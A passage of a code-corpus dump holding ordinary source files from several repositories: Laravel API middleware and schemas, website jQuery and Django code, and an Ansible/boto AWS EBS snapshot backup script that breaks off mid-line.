"alpha_fraction": 0.5950196385383606,
"alphanum_fraction": 0.5963302850723267,
"avg_line_length": 20.799999237060547,
"blob_id": "9aaad57eb554aca4c235844cd1043266bf0f77ee",
"content_id": "be475034860f721638285bed53b783ffa39ef13d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 763,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 35,
"path": "/app/Http/Middleware/LogResponses.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Middleware;\n\nuse Closure;\nuse Illuminate\\Http\\Request;\n\nclass LogResponses\n{\n /**\n * Handle an incoming request.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Closure $next\n * @return mixed\n */\n public function handle(Request $request, Closure $next)\n {\n return $next($request);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Illuminate\\Http\\Response|\\Illuminate\\Http\\JsonResponse $response\n */\n public function terminate(Request $request, $response)\n {\n logger()->debug('Response logged', [\n 'headers' => $response->headers->all(),\n 'content' => $response->content(),\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.530932605266571,
"alphanum_fraction": 0.5429362654685974,
"avg_line_length": 27.5,
"blob_id": "956b1909f933b8ff135ea906ff10e5f019b9ef71",
"content_id": "2533cb1c823564305e754ed5961fdd670c5a0036",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1083,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 38,
"path": "/app/Docs/Schemas/Admin/StoreAdminSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Admin;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass StoreAdminSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->required(\n 'name',\n 'phone',\n 'email',\n 'password'\n )\n ->properties(\n Schema::string('name')\n ->maxLength(255),\n Schema::string('phone')\n ->maxLength(255),\n Schema::string('email')\n ->maxLength(255),\n Schema::string('password')\n ->maxLength(255)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6026616096496582,
"alphanum_fraction": 0.6045627593994141,
"avg_line_length": 20.91666603088379,
"blob_id": "f0dcdc473a2bfe1e6f396c5992d51b3f323ce827",
"content_id": "5d7628877c7475e5c57e39c6f4fa85f0303d9c1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 526,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 24,
"path": "/database/factories/FileFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\File;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Str;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(File::class, function (Faker $faker): array {\n return [\n 'filename' => Str::random() . '.txt',\n 'mime_type' => File::MIME_TYPE_TXT,\n 'is_private' => false,\n ];\n});\n\n$factory->state(File::class, 'public', [\n 'is_private' => false,\n]);\n\n$factory->state(File::class, 'private', [\n 'is_private' => true,\n]);\n"
}
] | 285 |
singhsugga/nickelfox-web
|
https://github.com/singhsugga/nickelfox-web
|
d670f6edd3f18a62feded723235c41e88f1b9e2e
|
305139675d95780c93855f86c3da39bad22d115e
|
cf8250da740138ea001df87aedc4221def575db3
|
refs/heads/master
| 2021-09-28T06:28:11.225979 | 2018-11-15T06:40:17 | 2018-11-15T06:40:17 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 15.666666984558105,
"blob_id": "54548e045ca2b8f0a397ac34912089a3493e50ee",
"content_id": "d8af96626aaf6d28ffd28c7798d221b27cfdff61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "Django==2.1.3\ndjango-appconf==1.0.2\ndjango-compressor==2.2\ndjango-libsass==0.7\nlibsass==0.15.1\npytz==2018.7\nrcssmin==1.0.6\nrjsmin==1.0.12\nsix==1.11.0\n"
},
{
"alpha_fraction": 0.625246524810791,
"alphanum_fraction": 0.635108470916748,
"avg_line_length": 35.25,
"blob_id": "5553dd221d7bcf340b7e062e64c21bc822be3fb5",
"content_id": "3b126f8738c12f6b44d4986368e27d5b6e067886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1014,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 28,
"path": "/web/static/web/js/scroll-reveal.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "$(function () {\n // Initialization\n var controller = new ScrollMagic.Controller();\n\n var cs_study_carousel = new ScrollMagic.Scene({\n triggerElement: '#cs_study_target',\n triggerHook: 0.9,\n reverse: false\n }).setClassToggle('#cs_study_target #cs-study-carousel', 'slide-up').addTo(controller);\n\n var what_we_do_section = new ScrollMagic.Scene({\n triggerElement: '#what-we-do',\n triggerHook: 0.7,\n reverse: false\n }).setClassToggle('#what-we-do .text-wave-on-enter', 'text-wave-active').addTo(controller);\n\n var trusted_by_section = new ScrollMagic.Scene({\n triggerElement: '#companies',\n triggerHook: 0.65,\n reverse: false\n }).setClassToggle('#companies .companies__tile__img__wpr', 'reveal').addTo(controller);\n\n var press_section = new ScrollMagic.Scene({\n triggerElement: '#press',\n triggerHook: 0.55,\n reverse: false\n }).setClassToggle('#press .press-list ul li', 'reveal').addTo(controller);\n});"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 22,
"blob_id": "4db91d66210451de1fcb3822843409bc122147b4",
"content_id": "3ba3191c2961b689b2e3468221091fe363c61006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/README.md",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "# nickelfox-web-python"
},
{
"alpha_fraction": 0.531068742275238,
"alphanum_fraction": 0.5476387739181519,
"avg_line_length": 22.60784339904785,
"blob_id": "9e55f027b0e12859f6c094faffc9013ed4dcf707",
"content_id": "0f5d5c7c471efb8791ac8247d807055863f5f29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1207,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 51,
"path": "/web/static/web/js/home.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "var container = null;\nvar items = null;\nvar currentPos = 0;\nvar interval = null;\n\n$(document).ready(function () {\n $('.companies-list ul').slick({\n dots: false,\n autoplay: false,\n centerMode: true,\n infinite: true,\n variableWidth: true,\n slidesToShow: 1,\n speed: 300,\n });\n\n $('.testimonial_slider').slick({\n dots: true,\n infinite: true,\n autoplay: true,\n autoplaySpeed: 5000,\n speed:200,\n prevArrow: $('#testimonial-controls .slick-pre'),\n nextArrow: $('#testimonial-controls .slick-nex'),\n fade: true,\n cssEase: 'linear'\n });\n\n $('.cs_study_slick_slider').slick({\n dots: true,\n infinite: true,\n autoplay: true,\n autoplaySpeed: 10000,\n prevArrow: $('#cs-study-carousel .slick-pre'),\n nextArrow: $('#cs-study-carousel .slick-nex'),\n appendDots: $('.case_study_indicators'),\n speed: 300,\n fade: true,\n cssEase: 'linear'\n });\n\n \n});\n\n\nfunction testimonial_prev() {\n $('#testimonials .carousel').carousel('prev')\n}\nfunction testimonial_next() {\n $('#testimonials .carousel').carousel('next');\n}\n\n\n\n"
},
{
"alpha_fraction": 0.531086802482605,
"alphanum_fraction": 0.5371524691581726,
"avg_line_length": 36.099998474121094,
"blob_id": "09c4efe62c09877318fb1ab82e9194f21b79496e",
"content_id": "315afe4ebe0ad8d2d5e7896d8ed9093b7506a100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5935,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 160,
"path": "/web/static/web/js/main.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "var body = $('body');\nvar menu = $('.main-menu');\nvar main_menu_list = $('li.text-wave-on-click');\nvar expertiseHoverTimeout = null;\nvar scrollBarWidth;\nvar close_hamburger = $('#hmbrgr-icon-x');\nvar hamburger = $('#hmbrgr-icon-black');\n// $(window).on('load', function () {\n// $(window).scrollTop(0);\n// });\n\n$(window).on('resize', function () {\n getScrollBarWidth();\n});\n\n$(document).ready(function () {\n getScrollBarWidth();\n\n // FOR PREVENTING RELOAD ON SAME PAGE OF LINK IS CLICKED\n $(\"a\").each(function () {\n if (window.location.href == this.href) {\n var scope = $(this).attr('data-scope')\n this.onclick = function () {\n if (scope == 'main-menu') {\n toggle_menu();\n } else {\n $(\"html, body\").animate({ scrollTop: 0 }, 300, 'swing');\n }\n return false\n };\n }\n });\n \n $('[data-toggle=\"tooltip\"]').tooltip({\n trigger : 'hover'\n }).on('click',function () {\n $(this).tooltip('hide');\n });\n\n $('#main-menu').on('click', function (e) {\n if ($(this).is(e.target)) {\n toggle_menu();\n }\n });\n\n $('.text-wave-on-load').addClass('text-wave-active');\n //========== case study ===========//\n var cs_anim_triggers = $('.cs-anim-trg-1,.cs-anim-trg-2')\n var shrinking_divs = cs_anim_triggers.children().not('.no-animation');\n var growing_divs = shrinking_divs.children().not('.no-animation');\n cs_anim_triggers.hover(\n function () {\n growing_divs.addClass('cs_grow_anim')\n shrinking_divs.addClass('cs_srink_anim')\n },\n function () {\n growing_divs.removeClass('cs_grow_anim')\n shrinking_divs.removeClass('cs_srink_anim')\n }\n )\n\n //========== expertise section ===========//\n var timer_1, timer_2;\n $('.content').mouseenter(function () {\n var slide = $(this).attr('data-slide');\n $('.bg').removeClass('show').addClass('hide');\n $('.bg-' + slide).addClass('show');\n $('.bg-video').removeClass('show');\n $('.bg-video-' + slide).addClass('show');\n $('.content').removeClass('show').addClass('hide');\n $(this).addClass('show');\n $(this).find('.services__tile_list_content_wpr').addClass('slide-up');\n $(this).find('.arrow__btn').addClass('expertise__btn__hover')\n $(this).find('.slide__up__content__wpr').addClass('slide-up')\n\n }).mouseleave(function () {\n\n $('.bg').removeClass('show').removeClass('hide');\n $('.bg-video').removeClass('show');\n $('.content').removeClass('show').removeClass('hide');\n $(this).find('.services__tile_list_content_wpr').removeClass('slide-up');\n $(this).find('.expertise__btn__hover').removeClass('expertise__btn__hover');\n $(this).find('.slide__up__content__wpr').removeClass('slide-up');\n });\n\n $('#expertise').mouseenter(function () {\n var elem = $(this);\n expertiseHoverTimeout = setTimeout(function () {\n elem.addClass('active');\n }, 300);\n }).mouseleave(function () {\n var elem = $(this);\n elem.removeClass('active');\n clearTimeout(expertiseHoverTimeout);\n });\n\n\n $(document).on('click', '#apply-btn', function (e) {\n var modal_type = '';\n var modal_markup = '';\n if (this.id == 'apply-btn') {\n //for careers page\n modal_type = 'apply';\n var modal_markup = `<div id=\"apply-modal-wpr\" class=\"d-flex pop-up-modal px-3 align-items-center justify-content-center\">\n <div id=\"apply-modal\" class=\"d-flex flex-column px-3 align-items-center text-center justify-content-center \">\n <span class=\"text-white\" id=\"modal-dismiss\"></span>\n <div class=\"py-5\">\n <p class=\" fs-14 fw-300 fs-xl-18 m-0\">Send your resume to: <a class=\"text-white\" href=\"mailto:[email protected]\"><b>[email protected]<b></a></p>\n <button id=\"dismiss-apply-modal\" class=\"btn__normal btn__normal--light py-4 cursor w-50 fs-12 px-5 mt-5\">ok</button></div>\n </div>\n </div>`;\n }\n e.preventDefault();\n $(body).addClass('scroll-disabled');\n $(body).append(modal_markup);\n setTimeout(function () {\n $('#' + modal_type + '-modal-wpr').addClass('active');\n $('#' + modal_type + '-modal').addClass('active');\n }, 50);\n\n $('#' + modal_type + '-modal-wpr').on('click', function (e) {\n if ($(this).is(e.target) || e.target.id === 'dismiss-' + modal_type + '-modal') {\n $(body).removeClass('scroll-disabled');\n $(this).removeClass('active');\n $('#' + modal_type + '-modal').removeClass('active');\n setTimeout(function () {\n $(this).remove();\n }.bind(this), 350)\n }\n });\n\n });\n});\n\n\n//========== main menu section ===========//\nfunction toggle_menu() {\n menu.toggleClass('main-menu-active'); //toggle main menu\n close_hamburger.toggleClass('active');\n hamburger.toggleClass('inactive');\n if (window.is_dark_nav_active) {\n $('#hmbrgr-icon-white').toggleClass('show');\n $('#nfx-logo-white').toggleClass('show');\n $('#hmbrgr-icon-black').toggleClass('hide');\n $('#nfx-logo-black').toggleClass('hide');\n }\n // scroll bar hide hack to deal with sudden jerks \n $('body').toggleClass('scroll-disabled');\n if ($('#body').hasClass('scroll-disabled')) {\n $('#body,#navbar,#menu-wpr').css('margin-right', scrollBarWidth);\n } else {\n $('#body,#navbar,#menu-wpr').css('margin-right', 0);\n }\n\n main_menu_list.toggleClass('text-wave-active');// toggle main menu links animation\n}\n\nfunction getScrollBarWidth() {\n scrollBarWidth = window.innerWidth - document.documentElement.clientWidth;// scrollbar width on all devices\n}"
},
{
"alpha_fraction": 0.5093351006507874,
"alphanum_fraction": 0.5119554400444031,
"avg_line_length": 29.520000457763672,
"blob_id": "0489e8ad509be2b0852e2836c79a177995b770b6",
"content_id": "9f57ced350a8535377ff81edfd91b908ea57fe26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3053,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 100,
"path": "/web/static/web/js/navbar-state.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "$(function () {\n var has_scrolled = false;\n var $dark_sections = null;\n var ranges = [];\n var $nfx_logo_white = $('#nfx-logo-white');\n var $nfx_logo_black = $('#nfx-logo-black');\n var $hmbrgr_icon_white = $('#hmbrgr-icon-white');\n var $hmbrgr_icon_black = $('#hmbrgr-icon-black');\n var is_dark_nav_active = false;\n var $scrollTop;\n window.is_dark_nav_active = false;\n // initialize\n init_();\n first_time_load_exec();\n $(window).on('resize', function () {\n init_();\n });\n\n $(window).scroll(function (e) {\n has_scrolled = true;\n $scrollTop = $(this).scrollTop();\n });\n\n setInterval(check_range, 100);\n function check_range() {\n if (has_scrolled) {\n has_scrolled = false;\n var on_black_section = false;\n for (let i = 0; i < ranges.length; i++) {\n if ($scrollTop + 50 >= ranges[i].top && $scrollTop + 50 <= ranges[i].bottom) {\n on_black_section = true;\n break;\n }\n }\n\n if (on_black_section && !is_dark_nav_active) {\n is_dark_nav_active = true;\n window.is_dark_nav_active = true;\n activate_dark_nav();\n } else if (!on_black_section && is_dark_nav_active) {\n is_dark_nav_active = false;\n window.is_dark_nav_active = false;\n deactivate_dark_nav();\n }\n\n }\n }\n\n\n function init_() {\n if ($('#expertise-mobile').css('display') == 'none') {\n $('#expertise-mobile').removeClass('dark_section');\n } else {\n $('#expertise-mobile').addClass('dark_section');\n }\n\n if ($('#expertise').css('display') == 'none') {\n $('#expertise').removeClass('dark_section');\n } else {\n $('#expertise').addClass('dark_section')\n }\n ranges = [];\n $dark_sections = null;\n $dark_sections = get_dark_sections();\n set_ranges_object_array();\n }\n\n function get_dark_sections() {\n return $('.dark_section');\n }\n\n function set_ranges_object_array() {\n $dark_sections.each(function () {\n var $element = $(this);\n var element_top = $element.position().top;\n var element_bottom = element_top + $element.height();\n ranges.push({ top: Math.round(element_top), bottom: Math.round(element_bottom) })\n });\n }\n\n function first_time_load_exec() {\n has_scrolled = true;\n $scrollTop = $(window).scrollTop();\n }\n\n function activate_dark_nav() {\n $hmbrgr_icon_white.addClass('show');\n $nfx_logo_white.addClass('show');\n $nfx_logo_black.addClass('hide');\n $hmbrgr_icon_black.addClass('hide');\n }\n\n function deactivate_dark_nav() {\n $hmbrgr_icon_white.removeClass('show');\n $nfx_logo_white.removeClass('show');\n $nfx_logo_black.removeClass('hide');\n $hmbrgr_icon_black.removeClass('hide');\n }\n\n})\n\n"
},
{
"alpha_fraction": 0.3953010141849518,
"alphanum_fraction": 0.41483113169670105,
"avg_line_length": 49.07352828979492,
"blob_id": "cf65fd4c356cccebfa0f761c16b473b223cd11eb",
"content_id": "8000673c74ea7809bc0b1a0c01d2a79efb4a3f42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6810,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 136,
"path": "/web/static/web/js/validate.js",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "window.validate = function ($form) {\n $form.find('.input-wrapper').removeClass('error');\n $form.find('span.error').remove();\n\n var $isValid = true;\n var name_re = /^[a-zA-Z ]+$/;\n var email_re = /^(([^<>()\\[\\]\\\\.,;:\\s@\"]+(\\.[^<>()\\[\\]\\\\.,;:\\s@\"]+)*)|(\".+\"))@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))$/;\n var Url_re = /^(http:\\/\\/|https:\\/\\/)?(www.)?([a-zA-Z0-9]+).[a-zA-Z0-9]*.[a-z]{3}.?([a-z]+)?$/;\n var fb_re = /(?:(?:http|https):\\/\\/)?(?:www.)?facebook.com\\/(?:(?:\\w)*#!\\/)?(?:pages\\/)?(?:[?\\w\\-]*\\/)?(?:profile.php\\?id=(?=\\d.*))?([\\w\\-]*)?/;\n var mbl_re = /^(\\+|00){0,2}(9[976]\\d|8[987530]\\d|6[987]\\d|5[90]\\d|42\\d|3[875]\\d|2[98654321]\\d|9[8543210]|8[6421]|6[6543210]|5[87654321]|4[987654310]|3[9643210]|2[70]|7|1)\\d{1,14}$/;\n var link_re = /(ftp|http|https):\\/\\/?(?:www\\.)?linkedin.com(\\w+:{0,1}\\w*@)?(\\S+)(:([0-9])+)?(\\/|\\/([\\w#!:.?+=&%@!\\-\\/]))?/;\n var twitter_re = /http(?:s)?:\\/\\/(?:www\\.)?twitter\\.com\\/([a-zA-Z0-9_]+)/;\n $form.find('span.form-error').remove();\n $form.find('.required').each(function () {\n var $this = $(this);\n var $fieldName = $this.attr('data-field-name');\n var $fieldType = $this.attr('data-field-type');\n var $value = $this.val();\n var $textLength = null;\n if (Array.isArray($value) && $fieldType == 'multiselect') {\n $textLength = $value.length; // for multiselect ($value will be an array)\n } else {\n $textLength = $value.replace(/\\s/g, '').length;\n }\n switch ($fieldType) {\n case 'select':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'multiselect':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'text':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (name_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'url':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (Url_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'fb_url':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (fb_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'text_not_req':\n if (isNaN($value) == true) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'email':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (email_re.test($value.toLowerCase()) == false) {\n console.log($value.toLowerCase());\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'mobile_number':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (mbl_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'link':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (link_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'twitter':\n if ($textLength <= 0) {\n $this.parent().append('<span class=\"error\">' + $fieldName + ' required!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n } else if (twitter_re.test($value) == false) {\n $this.parent().append('<span class=\"error\">Invalid ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n case 'select':\n if ($value == '*' || $textLength <= 0) {\n $this.parent().append('<span class=\"error\">Select ' + $fieldName + '!</span>');\n $this.parent().addClass('error');\n $isValid = false;\n }\n break;\n }\n });\n\n return $isValid;\n}\n"
},
{
"alpha_fraction": 0.7137546539306641,
"alphanum_fraction": 0.7137546539306641,
"avg_line_length": 19.69230842590332,
"blob_id": "ff2d7bfbf44bac77b48afd884226dc1b25e2c46a",
"content_id": "3e1a8a34798ee076353c19a3166869d6d595ea3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/web/views.py",
"repo_name": "singhsugga/nickelfox-web",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n\n\n\ndef index(request):\n return render(request,'web/pages/index.html',{})\n\ndef careers(request):\n return render(request,'web/pages/careers.html',{})\n\ndef contact(request):\n return render(request,'web/pages/contact.html',{})\n"
}
] | 8 |
gauravrishi168/ansible
|
https://github.com/gauravrishi168/ansible
|
8d0b4ee411d16cb9c74506dcf9dcb030e4582f05
|
95d9d8a302c2d613cf8de46cdc8ea94e1afb45a6
|
4a8ec4e8bbe0d7fb8ba17e6b0732ae3e784dbeda
|
refs/heads/master
| 2021-01-19T16:25:57.383877 | 2017-12-09T06:27:50 | 2017-12-09T06:27:50 | 88,264,359 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4492063522338867,
"alphanum_fraction": 0.4714285731315613,
"avg_line_length": 18.090909957885742,
"blob_id": "372069284ff1f4419c54d822acbb895ac51ef673",
"content_id": "80c8b0101294b7a9d253807d6ae46ca8e46a06d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 33,
"path": "/aws-volume-snapshot/README.md",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "# awsbackup.yml\n\nThis is an awsbackup.yml playbook. \nExample run:\n\n```\nansible-playbook -i inventory/localhost awsbackup.yml -e \"INCREMENTAL=daily COUNT=3\"\n```\n\n# AWS policy\n\nThe following is the AWS policy used to run this playbook.\n\n```\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"ec2:CreateSnapshot\",\n \"ec2:CreateTags\",\n \"ec2:DeleteSnapshot\",\n \"ec2:CreateVolume\",\n \"ec2:Describe*\"\n ],\n \"Resource\": [\n \"*\"\n ]\n }\n ]\n}\n```\n"
},
{
"alpha_fraction": 0.6232114434242249,
"alphanum_fraction": 0.683624804019928,
"avg_line_length": 32.105262756347656,
"blob_id": "8c930abf5b58409addcf549effc04a2c43ad954b",
"content_id": "914a2e6e6dd78ddf343203c5d86dc7c33b3ba498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 629,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/ansible-demo/misc/Vagrantfile",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "Vagrant.configure(2) do |config|\n config.vm.define \"webserver\" do |webserver|\n webserver.vm.box = \"hashicorp/precise32\"\n webserver.vm.network \"private_network\", ip: \"192.168.0.2\"\n webserver.vm.hostname = \"webserver\"\n end\n config.vm.define \"ansible\" do |ansible|\n ansible.vm.box = \"hashicorp/precise32\"\n ansible.vm.network \"private_network\", ip: \"192.168.0.254\"\n ansible.vm.hostname = \"ansible\"\n end\n\nconfig.vm.define \"rishi\" do |rishi|\n rishi.vm.box = \"ubuntu/trusty32\"\n rishi.vm.network \"private_network\", ip: \"192.168.0.26\"\n rishi.vm.hostname = \"rishi\"\n rishi.vm.boot_timeout = 1000\n end\nend\n"
},
{
"alpha_fraction": 0.6407819390296936,
"alphanum_fraction": 0.6423959732055664,
"avg_line_length": 42.90550994873047,
"blob_id": "b586f4b22fc72ad167e3fef4e60cfe87379a272b",
"content_id": "63362bac2daa0e42857a4ac55f270ebef195a972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5576,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 127,
"path": "/aws-volume-snapshot/awsbackup.py",
"repo_name": "gauravrishi168/ansible",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport boto.ec2\nimport logging\nimport imp\nimport os\nimport sys\nfrom configparser import ConfigParser\nfrom datetime import datetime, timedelta\nfrom optparse import OptionParser\n\nclass AwsBackups():\n def __init__(self, options, args, profile):\n self.snapdate = datetime.now().strftime(\"%Y-%m-%d\")\n self.readable_date = datetime.now().strftime(\"%m-%d-%Y %H:%M:%S\")\n logging.basicConfig(level=logging.INFO)\n self.logger = logging.getLogger()\n\n self.options = options\n self.options.max = int(self.options.max)\n self.args = args\n self.volumes_to_snap = []\n self.instances_to_snap = {}\n self.log_names_to_snap = {}\n self.log_snapshots_to_delete = []\n self.log_snapshots_created = {}\n region = \"us-east-1\"\n self.conn = boto.ec2.connect_to_region(region, aws_access_key_id=profile.get(options.profile, 'aws_access_key_id'), \\\n aws_secret_access_key=profile.get(options.profile, 'aws_secret_access_key'))\n\n def getInstancesFull(self):\n self.reservations = self.conn.get_all_instances(filters={\"tag-key\":self.options.key, \"tag-value\":self.options.tag})\n self.instances = [i for r in self.reservations for i in r.instances]\n for i in self.instances:\n self.volumes_to_snap.extend(v.id for v in self.conn.get_all_volumes() if v.attach_data.instance_id == i.id)\n self.instances_to_snap.update({i:self.volumes_to_snap})\n self.log_names_to_snap.update({i.tags['Name']:self.volumes_to_snap})\n self.volumes_to_snap = []\n\n def takeSnapshotsFull(self):\n for i in self.instances_to_snap:\n self.volumes_to_snap.extend(v.id for v in self.conn.get_all_volumes() if v.attach_data.instance_id == i.id)\n for v in self.instances_to_snap[i]:\n snapshot = self.conn.create_snapshot(v, \"Automated snapshot.\")\n myname = i.tags['Name'] + '_daily_' + self.snapdate\n snapshot.add_tags({'Name': myname, self.options.key: self.options.tag, 'identifier': 'awsbackup'})\n self.log_snapshots_created.update({myname:self.volumes_to_snap})\n self.volumes_to_snap = []\n\n def getSnapshotsFull(self):\n for i in self.instances_to_snap:\n print self.instances_to_snap[i]\n for v in self.conn.get_all_volumes(filters={'attachment.instance-id': i.id}):\n self.deleteSnapshotsFull(v)\n\n def deleteSnapshotsFull(self, v):\n snapshots = self.conn.get_all_snapshots(filters={'volume-id': v.id, \"tag-key\":self.options.key, \"tag-value\":self.options.tag, \\\n \"tag-key\":'identifier', \"tag-value\":'awsbackup'})\n print len(snapshots)\n snap_sorted = sorted([(s.id, s.start_time) for s in snapshots], key=lambda k: k[1])\n print snap_sorted\n for s in snap_sorted[:-self.options.max]:\n self.log_snapshots_to_delete.append(s[0])\n self.conn.delete_snapshot(s[0])\n\n def reportBackup(self):\n # self.logger.info(\"<b>AWS snapshot complete.<br> Instances snapshotted: </b>\" + str(self.log_names_to_snap.keys()) + \"<br>\" + \\\n # \"<b>Snapshots created: </b>\" + str(self.log_snapshots_created.keys()) + \"<br>\" + \\\n # \"<b>Snapshots deleted: </b>\" + str(self.log_snapshots_to_delete))\n self.logger.info(\"AWS snapshot script -----------------> Started: \" + self.readable_date)\n self.logger.info(sys.argv[0] + \" -p \" + self.options.profile + \" -k \" + self.options.key + \" -t \" + self.options.tag)\n self.logger.info(self.readable_date)\n self.logger.info(\"AWS snapshot complete.\")\n self.logger.info(\"Snapshots created:\")\n for each in self.log_names_to_snap.keys():\n self.logger.info(each)\n for each in 